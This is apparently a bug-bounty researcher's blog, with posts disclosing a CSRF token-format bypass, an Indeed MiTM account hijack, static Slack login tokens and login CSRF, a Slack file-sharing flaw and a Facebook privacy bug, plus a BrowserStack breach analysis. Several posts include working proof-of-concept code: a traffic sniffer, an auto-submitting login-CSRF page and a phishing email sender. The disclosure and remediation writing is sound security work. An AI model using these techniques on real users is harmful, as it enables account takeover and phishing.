
A CSRF Protection Bypass Technique

This technique can be used to bypass CSRF protection in some applications by submitting a static CSRF token (the same for every user of the application) that merely matches an expected format.

So, to begin with, have you ever noticed CSRF tokens that look something like this:

RHAU3cgmTvWy6RWSj+NdJy2v8y8Z0g2U5qTQg4ap/lqeLEfA==

If you have, have you ever looked at it more closely? The above string is basically divided into 3 parts separated by some delimiters. In the above example, the first part “RHAU3cgmTvWy6RWSj” and the second part “NdJy2v8y8Z0g2U5qTQg4ap” are separated by the delimiter “+”. The second part “NdJy2v8y8Z0g2U5qTQg4ap” and the third part “lqeLEfA” are separated by the delimiter “/”. The string finally ends with “==”.

So, considering the above example, if you encounter an application that uses CSRF tokens like the one shown above, try fiddling with the actual string while keeping the format consistent, i.e. 3 parts separated by the same delimiters and ending with the same padding.

In my case, the format ended up being “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” which when decoded is “xxxxxxxxxxxxxxxxxxxxxxxxx+xxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw==”
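As a quick sanity check, the URL-encoded form above decodes with a couple of lines of Python; the x counts below mirror the masked PoC string:

    from urllib.parse import unquote

    # The URL-encoded token format observed above (x's mask the real characters).
    encoded = "x" * 25 + "%2B" + "x" * 26 + "%2F" + "x" * 32 + "w%3D%3D"

    # unquote() turns %2B into "+", %2F into "/" and %3D into "=",
    # recovering the base64-looking three-part format.
    print(unquote(encoded))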

The length of the string (i.e. the number of x’s) will vary from application to application. So, consider this just a PoC.

In a nutshell, what I observed was that an attacker can trick a victim into submitting a POST request with the above string as the csrf token POST parameter, and the application server will gladly accept it, because the server only checks that the token matches a specific format and never compares the received value against the value stored on the server side. As a result, I was able to bypass CSRF protection throughout the entire application.
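I obviously don’t have the application’s source, but the flawed check presumably looked something like the sketch below: a regex that validates only the *shape* of the token. All names here are hypothetical.

    import re
    import hmac

    # Hypothetical reconstruction: a token is accepted if it merely *looks*
    # like a base64-style three-part string ending in "==".
    TOKEN_FORMAT = re.compile(r"^[A-Za-z0-9]+\+[A-Za-z0-9]+/[A-Za-z0-9]+==$")

    def validate_csrf_vulnerable(submitted_token: str) -> bool:
        # BUG: format check only -- any well-shaped token passes.
        return TOKEN_FORMAT.match(submitted_token) is not None

    def validate_csrf_fixed(submitted_token: str, stored_token: str) -> bool:
        # Correct: compare against the per-session value stored server side,
        # in constant time.
        return hmac.compare_digest(submitted_token, stored_token)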

———————————————————————

There are some more nuances to the above scenario as well. Consider the case of double-submit CSRF protection, which requires the CSRF token to be sent in two places – for example, in a session cookie and in the POST body, or in a custom header and a session cookie, or in a custom header and the POST body. There are multiple possible combinations.

The gist is that the two values must be identical. This is mostly done to avoid the headache of storing CSRF values on the server side. In such cases, bypassing the protection is not easy because, as an attacker, you have no control over the victim’s browser to set custom headers or session cookies. The most you can do is trick the victim into submitting a malicious POST request. But since the browser sends the headers and/or cookies automatically, the chances of those values matching the value in your POST request are negligible. Hence, the protection, if implemented properly, can be quite effective.
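For completeness, here is what a sound double-submit comparison boils down to – a minimal sketch, independent of any framework:

    import hmac

    def double_submit_ok(cookie_token: str, body_token: str) -> bool:
        # Both copies must be present and identical. An attacker can choose
        # the POST body value, but cannot set the victim's cookie, so a
        # forged request fails this check.
        if not cookie_token or not body_token:
            return False
        return hmac.compare_digest(cookie_token, body_token)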

But in the application discussed above, it was observed that even though the browser was automagically sending a custom header and/or session cookie along with the attacker-supplied value “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” in the POST body, the server only checked that the format matched, not the actual values. So, again, this was a complete CSRF protection bypass: it didn’t matter what CSRF values the browser sent (as headers and/or cookies) as long as an attacker could trick a victim into submitting a POST request with the static CSRF string above.

I am not sure if this technique was already known. If it was, pardon my ignorance. I found it during testing and thought it was pretty interesting, hence this post.

Cheers!

Account Hijacking in Indeed

Authenticating to an account in the Indeed iPhone app and then changing the country appears to log the user out. The country changes just fine, but instead of the user remaining signed in, a “Sign In” option appears in the application. When the user taps this “Sign In” option, a series of requests is sent to the server that automatically logs the user back in (obviously, because the user never logged out in the first place – the user just changed the country).

Among these requests, there is one particular request sent to the “/account/checklogin” endpoint carrying the value “passrx” over plain HTTP. This means a MiTM attacker can easily capture this URL off the network.

The attacker can then use the captured URL to take over the victim’s account completely.
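To illustrate how little effort the capture takes, here is a minimal mitmproxy addon sketch; the endpoint path comes from the report, everything else is illustrative:

    # checklogin_sniffer.py -- run with: mitmproxy -s checklogin_sniffer.py
    from mitmproxy import http

    def request(flow: http.HTTPFlow) -> None:
        # The vulnerable request travels over plain HTTP, so a network
        # attacker sees the full URL, including the passrx value.
        if flow.request.scheme == "http" and "/account/checklogin" in flow.request.path:
            print("captured:", flow.request.pretty_url)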

It should also be noted that this is not only an account hijacking vulnerability but also a login CSRF vulnerability. An attacker can easily capture the above request for his own account and then trick a victim into logging in to that account.

But, obviously, the more serious vulnerability here is account hijacking by a MiTM attacker.

A PoC video demonstrating the vulnerability is here.

This vulnerability was reported via Bugcrowd to the Indeed bug bounty program and was deemed a duplicate. I then got explicit permission from the program owners to disclose it publicly.

Cheers!

A little note about Slack’s Bug Bounty program

I reported a bug to Slack via HackerOne on December 13, 2014. Slack closed it as N/A. Since it was N/A, I went ahead and blogged about it here on December 18, 2014. I also gave them a heads-up on the HackerOne submission that I would be disclosing it before I actually did. They kept radio silence, so I assumed they didn’t have any issues. They never asked me not to disclose, which would make sense given the bug was marked N/A, meaning they weren’t interested in it in the first place.

A day earlier, on December 12, 2014, I had reported another bug to Slack via HackerOne, which they closed as Duplicate. The entire submission, along with the conversations, can be found here. In a nutshell, they wanted to do a coordinated disclosure once the issue was fixed. I was perfectly fine with that; I completely understand and respect the ethics of a bug bounty program, and I agreed. But after that, there was complete radio silence. I tried following up multiple times, but nobody responded or updated me regarding the fix, as is evident from the document. I also left a comment (a month, and again four days, before the disclosure) saying that if I didn’t hear back with any update, I would disclose the issue 90 days after the initial submission. That seems to be the industry trend these days, so I chose to stick with it. I finally disclosed it here on this blog.

On March 12, 2015, I reported yet another bug to Slack, again via the HackerOne platform. This bug was closed today, March 16, 2015, as N/A without any explanation or reasoning. The entire conversation, along with the bug submission, can be found here. Consider that document a public disclosure for this bug, since it is closed as N/A and they don’t seem to be interested in it anyway.

As is evident from the latest bug submission document, I have been told that I have “gone against the spirit of a bug bounty program by disclosing things without consent”. They feel that for the second bug described above, “the disclosure is owned by the original reporter” and that “By disclosing this without coordinating” I have stolen “the original reporter’s opportunity to disclose a finding.” They apparently spoke to HackerOne last week and asked to have me removed from participating in their bug bounty program. I was supposedly going to receive some communication regarding this (which, btw, I never did).

Final Thoughts:

I am honestly very disappointed with how things have been handled. I don’t think I did anything against the spirit of a bug bounty program. I am all for coordinated disclosure, but if the program owners fail to coordinate or communicate in a timely manner, there is no such thing as coordinated disclosure. Combined with their responses to all my bug submissions and their decision to ban me from participating in their program, this is probably the worst experience I have had so far, and I feel it is a perfect example of how not to operate a bug bounty program.

I would love to get some feedback and thoughts on this. I am open to criticism and improving anything that I could have done better from my side to make this less painful.

Static Token used for authentication in the Slack iOS application

When I register a Slack team from the Safari browser on my iPhone, the final request for registering the team looks like:

[Screenshot: the final team-registration request]

The response to this request is a redirect to the URL https://slack.com/checkcookie?redir=https%3A%2F%2Fn00bgiri.slack.com%2F%3Ffresh which is then redirected to https://n00bgiri.slack.com/?fresh which is then redirected to https://n00bgiri.slack.com/app. The series of these requests/responses can be seen below:

[Screenshot: the redirect chain of requests/responses]

The final response for the request https://n00bgiri.slack.com/app looks like:

[Screenshot: the final response for https://n00bgiri.slack.com/app]

This screenshot is taken from the Safari browser on the iPhone.

An important thing to notice here is the option “Open Slack”. That is actually a hyperlink that looks like: <a href="slack://login/<redacted>/xoxo-<redacted>-<redacted>" class="btn btn-primary btn-large">Open Slack</a>

The value xoxo-<redacted>-<redacted> in the above URL is the key to the kingdom. It can essentially be considered a replacement for the username/password combination. It is a static value that does not change or get invalidated even when the account is logged out. This brings us to the first issue: if an attacker gets hold of a victim’s xoxo value (via various attack vectors that are out of scope for this discussion), he can essentially gain complete access to the victim’s account, perpetually. It does not matter whether the victim is logged in, since the token is static and does not get invalidated on logout. Please note that this value should not be confused with another, similar-looking token of the form xoxs-<redacted>-<redacted>-<redacted>-<redacted>; I will describe that value in a moment. Also important to know: the xoxo value is only created and sent in a response once, when the team is first registered.

Now, the normal authentication flow in the Slack iOS app is something like below:

  • The first authentication request is sent to the URL https://slack.com/api/auth.signin with the POST parameters email, password and team.
  • In response to the above request, the server assigns and sends a token (xoxs-<redacted>-<redacted>-<redacted>-<redacted>) in the JSON response.
  • Then, a request is sent to the URL https://slack.com/api/users.login with the POST parameters agent, set_active and token. The token sent here is the xoxs token received above. This completes the authentication flow.
  • The xoxs token is then used in all subsequent requests.
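Replaying that flow outside the app is straightforward. A hedged sketch with the requests library, using the endpoints and parameter names listed above (the JSON key for the token and the agent value are my assumptions):

    import requests

    # Step 1: sign in with email/password/team (placeholder values).
    r = requests.post("https://slack.com/api/auth.signin",
                      data={"email": "user@example.com",
                            "password": "hunter2",
                            "team": "n00bgiri"})
    xoxs_token = r.json()["token"]  # assumed key; the value is xoxs-...

    # Step 2: present the xoxs token to users.login; it is then reused
    # in all subsequent requests.
    requests.post("https://slack.com/api/users.login",
                  data={"agent": "ios",  # assumed value
                        "set_active": "1",
                        "token": xoxs_token})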

Now, if you log out of the iOS application, this xoxs token gets invalidated (as it should be), but the static xoxo token discussed earlier does not. And that’s the problem.

This brings me to the second attack aka Login CSRF:

Normally, in a login CSRF attack, an attacker tricks a victim into submitting an authentication request with the attacker’s username and password as parameters. If there is no CSRF token in this request, it becomes possible to trick victims into authenticating to an attacker-controlled account.
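The attacker’s page in that conventional scenario is just an auto-submitting form. A generic sketch, generated from Python to keep the examples in one language (the parameter names are the ones from the flow above; the token is the attacker’s own):

    # Writes a classic login-CSRF PoC page: a form that submits the
    # attacker's own token the moment the victim loads it.
    POC = """<html><body>
    <form id="f" action="https://slack.com/api/users.login" method="POST">
      <input type="hidden" name="agent" value="ios">
      <input type="hidden" name="set_active" value="1">
      <input type="hidden" name="token" value="xoxs-ATTACKER-TOKEN">
    </form>
    <script>document.getElementById("f").submit();</script>
    </body></html>"""

    with open("poc.html", "w") as fh:
        fh.write(POC)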

So, we now know that the xoxo token is static and can be treated as a username/password combination. Therefore, the authentication request would look something like this:

[Screenshot: the authentication request sent by the Slack iOS app]

Notice there is nothing that can be considered as a CSRF token in the above request.

I have created a video PoC for this attack as well.

Exploiting the Login CSRF is extremely easy in this case.
What I essentially did was, as the attacker, note down the hyperlink that the server sent when I first registered my team: slack://login/<redacted>/xoxo-<redacted>-<redacted>

I then sent the victim an email with the above link as a hyperlink. When the victim clicks it, the Slack iOS app opens and sends the above authentication request automatically. I didn’t even have to craft an HTML page that sends a POST request to the /api/users.login endpoint – it was as simple as tricking the victim into clicking a GET URL. The Slack app does all the legwork for the attacker.
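In other words, the whole exploit fits in an email. A sketch with the standard library – the SMTP host and addresses are placeholders, and the link is the attacker’s own xoxo URL:

    import smtplib
    from email.mime.text import MIMEText

    # The attacker's own slack:// login URL, noted down at registration time.
    body = ('Click to view: <a href="slack://login/REDACTED/'
            'xoxo-REDACTED-REDACTED">Open document</a>')

    msg = MIMEText(body, "html")
    msg["Subject"] = "Shared with you"
    msg["From"] = "attacker@example.com"
    msg["To"] = "victim@example.com"

    with smtplib.SMTP("smtp.example.com") as s:
        s.send_message(msg)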

So, that’s it folks. To summarize, I described 2 issues above:

  1. Static tokens that don’t get invalidated
  2. Login CSRF

 

Remediation:

I am not an expert in iOS pentesting, but I googled the correct way to handle iOS URL schemes and found some resources worth looking into. The premise is essentially that the app should ask the user before automatically opening a slack:// URL in the Slack application; that would mitigate the Login CSRF issue.

For the static token issue, I think it’s a bad idea to associate static tokens with user accounts altogether, so that should be looked into and, ideally, eliminated. Failing that, I see no reason to send that value in cleartext in the response after registering.

 

Slack’s Response:

Thanks for your extensive report. Both of these issues are already known and being fixed.

1) The static tokens are something we are moving away from for all apps, including iOS. We hope to have this completed soon.
2) There is not much security implication of logging a user in this way. Because Slack groups are closed to the public, it would be difficult to convince the user they are in the correct group if you manage to log them in. We have an open bug to add CSRF to the login page, but this is low priority.

 

Cheers!

 

 

A bug in Facebook that violated my privacy

The bug I am going to describe here was discovered accidentally while I was checking my privacy settings on Facebook. It is so simple that one doesn’t need to be technical at all to find it – it could literally have been discovered by anybody. I guess I just got lucky, and the fact that I have been a Facebook user since 2007 aided the discovery as well. The bottom line is that you just need to be looking at the right place at the right time to earn bounties from the various bug bounty programs out there.

Anyways, let’s get to the bug now.

Privacy Violation Bug#1

This bug disclosed the “parents” information of some Facebook users to the public, in spite of privacy settings explicitly set to hide that information from the public and from friends. I believe this affected certain Facebook users and not all – especially those who have been on Facebook since around 2007.

I’ve had my Facebook account since 2007 and I believe Mark Zuckerberg did too :)

Both Zuck and I were affected by this. I am sure there were others affected as well.

I’ll let you watch this video http://youtu.be/UFd68EG3E98 to show this in action.

It was as simple as clicking a hyperlink for the “BORN” highlight on your timeline. That would take you to a page that looks something like https://www.facebook.com/<user-id>/posts/<post-id>/. And, you would see yourself tagged with your parents.

This bug was worth $5000. I think that is a pretty generous amount, but I am sure they rewarded it considering how easily this information could be leaked and the privacy violation it meant for a lot of Facebook users.

Cheers!

Hidden Feature in Slack leads to Unauthorized Information Leakage of Files

Before I get started, here is a legend:

  • Victim – V
  • Attacker – A
  • Public URL – PU
  • Shared URL – SU

Now, let’s get to the issue.

There is a hidden feature in Slack that is not directly accessible from the UI, nor documented. But it is a pretty simple call to an API endpoint that can be made via a proxy tool such as Burp. The API call is used to “unshare a file shared with a Slack user”. An important point to note: this vulnerability is about sharing a file with a different *user*, NOT within a channel. The sharing-unsharing of files within a channel is a legitimate feature in the UI, also mentioned in the tweet from Slack here. This vulnerability is not about that; it is about sharing-unsharing files with users directly, not within channels.

So, due to this hidden feature, it is possible to share a file from V to A and then unshare it again (assuming V changes their mind and no longer wants to share the file with A), rendering the file inaccessible to A via the SU.
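Since the endpoint is undocumented, I won’t reproduce it verbatim; the call below is hypothetical in everything but shape – a single authenticated API request, easily replayed from Burp, that flips the shared/unshared state of a file for a *user*:

    import requests

    # NOTE: the method name and parameters here are placeholders, not the
    # real undocumented endpoint.
    resp = requests.post("https://slack.com/api/files.unshare",
                         data={"token": "xoxs-REDACTED",   # V's session token
                               "file": "F0XXXXXXX",        # the shared file
                               "user": "U0XXXXXXX"})       # unshare from A
    print(resp.json())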

It was observed that it is possible to get past this control by accessing the now-unshared file via a different URL – the PU. Please see the video PoC or the reproduction steps for how A can find the PU and store it before V decides to unshare the file.

So, after the file is unshared with A, A accesses the PU (stored earlier) and the file becomes public to everyone in the team without V’s knowledge. You can think of it as an Insecure Direct Object Reference vulnerability. This is the first problem.

Then, assuming V happens to navigate to that file again, V suddenly notices that the unshared file has been made public via the PU without V’s knowledge or consent. But V does not freak out, because V can still revoke the PU so that it is no longer accessible to A or anybody else. This revocation feature is provided in the UI, and it works: the PU does get revoked and becomes inaccessible, and it appears the file can no longer be accessed or viewed by A or any other team member by any other means.

But the problem does not end just yet. On A’s Slack homepage, in the right-hand pane, A notices that this file is still visible. A clicks on the file, refreshes the UI, and can still view the contents of the file, including whatever changes V has made or makes in the future. This is the second problem.

So, this is clearly a security vulnerability: an attacker can view a file despite it being repeatedly unshared.

I also sent them a video PoC demonstrating this in action. If you are interested, you can view it here. The video is a bit long (~9 mins) and the volume is a little low, so you would need headphones of some kind to listen to my irritating voice :-)

The report along with the comments on HackerOne is available here.

 

Conclusion

I am disappointed with how Slack dismissed my original report without bothering to read it properly, make sense of it, or ask me questions if they didn’t understand something. I totally understand and respect their decision that this falls outside the scope of their bug bounty program – but I wasn’t asking to be rewarded in the first place; I was simply reporting a security vulnerability. Scoping and whether to reward a certain bug are completely up to them, and I understand that, as a researcher, I need to respect that. But they have not mentioned anything about “Undocumented APIs” in their scope, so how would a researcher know what is in scope and what is out? All I can see in their guidelines is “Our security team will assess each bug to determine if it qualifies.” Yet they failed to assess the bug properly in the first place.

Anyways, some takeaways for both programs and researchers from this are:

  • Read the bug report once. If it’s confusing or doesn’t make sense, read it again. Ask the researcher if it’s still not clear. Make an effort to watch/read the PoC provided. Don’t just assume things.
  • Document features/functions/API calls if you allow them. Not documenting something yet silently allowing it can be an issue, as is evident from this case. They are relying on the fact that this feature is not being used by Slack users, which is naive IMHO.
  • Revise your scope to make it fine grained and much clearer. Scoping is a constant learning/revision process.
  • Don’t ignore the underlying problem, which in this case I *believe* is that the “permalink_public” URL is generated without any need for it. Why generate this URL before a file is ever made public? And even if it is generated early, why send it to the client? It is like opening a can of worms. I don’t think it is necessary, but they failed to even acknowledge that or explain why they do it.
  • Researchers need to submit quality reports and should not be discouraged by dismissive responses. We need to change the assumption most bug bounty programs seem to hold these days – that all researchers want is a bounty for a crappy report.

That’s it folks.

 

Cheers!

Analysis of the BrowserStack breach – A classic example of “Pivoting in the Clouds”

BrowserStack was recently breached and it was all over the news as is the case with almost all breaches these days.

In this blog post, I will briefly describe what happened to make everybody aware that things can go really wrong in the Cloud if proper measures are not taken.

 

The TL;DR version:

BrowserStack’s infrastructure is hosted on the Amazon Web Services (AWS).

They had one particular machine (a virtual instance, in this case) on AWS that was not patched against the Shellshock vulnerability.

The attacker leveraged that to pivot through the various moving parts within their AWS setup and steal some information from their production database.

The attacker then used the stolen data and the credentials for their AWS SES service (see below) to send emails to some BrowserStack users stating that BrowserStack was shutting down. Ouch!!

 

The longer version:

The attackers took advantage of the unpatched instance:

  • logged in to that instance
  • created an IAM user (see below) and generated a key pair using the secret keys stored on that instance
  • spawned a new instance using the newly created credentials
  • mounted one of the production backup disks to this instance
  • retrieved a config file containing the database password from this backup
  • partially copied database tables and stole some data

While the database tables were being copied, an alert was triggered and the BrowserStack folks acted immediately, blocking the IP.

 

But by this time, the attacker had already stolen some data along with the SES credentials (see below), which helped them send a fake email to some BrowserStack users.

 

IAM

This is the AWS Identity and Access Management solution, where you can create multiple users in an organization and assign them appropriate access rights following the principle of least privilege. In other words, give an individual only the amount of access that the individual’s role demands. Nothing more than that.

 

SES

This is the AWS Simple Email Service, a service for sending out emails.

 

Below is purely my analysis of this incident. Please feel free to comment/ask questions/criticize:

 

Some of the poor practices by BrowserStack on the AWS Cloud:

1. AWS secret keys were stored on the unpatched instance. Secret keys should be stored securely following the AWS best practices.

2. I don’t think they had an inventory of all their running AWS instances. Maybe they did, since one can be obtained from the AWS Console, but I cannot be sure. Assuming they knew about this running instance, they should really have patched it against Shellshock. This was the root cause, and addressing it could have prevented the breach altogether even if no other protections existed.

3. They did have some alerts, but they should have built many more – for example, on creating a new IAM user, creating key pairs, etc.

4. Allowing IAM users to be created with elevated privileges. This is an educated guess: if the newly created IAM user could start a new instance, mount a backup to it, and so on, it presumably had elevated privileges. Was that really necessary? (See the sketch after this list.)

5. 2-factor authentication. AWS provides the capability to implement 2-factor authentication, which I don’t think was being leveraged here.

6. Storage of sensitive information. The database password was stored in a readable config file. This could have been locked down better. Was the backup disk the only place where they stored the database password?

7. There is no mention of how the attacker obtained the SES credentials. I am guessing they were stored on the backup disk as well.
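On point 4 above, scoping an IAM user down is a one-call operation. A boto3 sketch of an inline policy that, for example, only allows sending mail through SES – all names and the policy itself are illustrative:

    import json
    import boto3

    # Example least-privilege policy: this user can send mail via SES and
    # nothing else -- no ec2:RunInstances, no volume mounts, no IAM changes.
    policy = {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Action": ["ses:SendEmail", "ses:SendRawEmail"],
            "Resource": "*",
        }],
    }

    iam = boto3.client("iam")
    iam.put_user_policy(UserName="mailer-bot",
                        PolicyName="ses-send-only",
                        PolicyDocument=json.dumps(policy))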

 

Having talked about the poor practices, there were some things that BrowserStack did well:

1. Passwords hashed using bcrypt. This is a biggie!! Never store passwords in cleartext. (See the sketch after this list.)

2. Alerts triggered at some point. The alert triggered while the database tables were being copied drastically reduced the magnitude of the impact, so that’s good.

3. They mention auditing via AWS CloudTrail, which helped them track the attacker’s movements.

4. Credit card data was processed through a 3rd party, so card details were not stored on their instances. Again, this is a biggie when it comes to dealing with credit card data in the cloud; leveraging a 3rd party often helps, as is evident from this case.

5. Locking the database when it is copied. A good failsafe mechanism, which helped them to some extent in this case.

6. Other instances were patched against Shellshock, so the attack surface was reduced.

7. Instances protected by OS firewalls in addition to network firewalls. Defense in depth.

8. They mention implementing “security groups”, which is an AWS good practice. This helps segregate and isolate different moving parts.

9. Most importantly, they were pretty quick in responding to this breach. So, that was a big plus!

10. They made some further improvements, mentioned in the link below, like encrypting backups, auditing logs more, revoking all existing AWS keys, improving monitoring, and requesting a 3rd party to conduct a security audit. All of these will definitely improve their security posture.
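On point 1 above, for anyone unfamiliar with it, bcrypt hashing is a couple of lines; a minimal sketch with the bcrypt package:

    import bcrypt

    # Hash at registration time: gensalt() embeds a per-password salt and a
    # tunable work factor into the stored hash.
    hashed = bcrypt.hashpw(b"correct horse battery staple", bcrypt.gensalt())

    # Verify at login time: checkpw re-derives the hash from the candidate
    # password plus the stored salt/cost and compares.
    assert bcrypt.checkpw(b"correct horse battery staple", hashed)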

 

Reference URL:

http://www.nextbigwhat.com/browserstack-hack-attack-explanation-297/